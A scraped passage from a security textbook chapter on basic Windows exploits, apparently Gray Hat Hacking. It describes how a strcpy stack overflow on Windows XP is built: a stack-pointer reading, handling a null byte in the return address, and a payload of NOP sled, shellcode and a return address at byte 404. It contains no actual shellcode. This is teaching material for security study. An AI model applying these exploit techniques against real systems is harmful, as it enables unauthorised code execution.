c
... (compiler output removed for brevity) ...
C:\grayhat>get_sp.exe
Stack pointer (ESP): 0x12ff60
Onthis Windows XP machine,we can reliably use the stack pointer address 0x0012ff60
in this specific situation. Notice, however, that the first byte of the 4-byte pointer address is
0x00 (get_sp.exe doesn??™t showit explicitly, but it is implied because it shows only 3 bytes).
The strcpy we are about to exploit will stop copying when it hits that null byte (0x00).
Thankfully, the null byte comes as the first byte of the address andwe will be reversing it to
place it on the stack, so the null byte will safely become the last byte passed on the command
line. This means we can still pull off the exploit, but we can??™t repeat the return
address. In this case, our exploit sandwich will be a short nop sled, the shellcode, nops to
extend to byte 404, then a single copy of our return address at byte 404.
Figure 11-4 Testing our shellcode to execute the calc.exe command
Chapter 11: Basic Windows Exploits
263
PART III
Building the Exploit Sandwich
Let??™s go back to our command.pl to build the exploit. For this, you??™ll want to again copy
and paste the Metasploit shellcode generated earlier. This time, use the Perl-formatted
shellcode on the generated shellcode result page to save yourself some reformatting.
Pages:
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483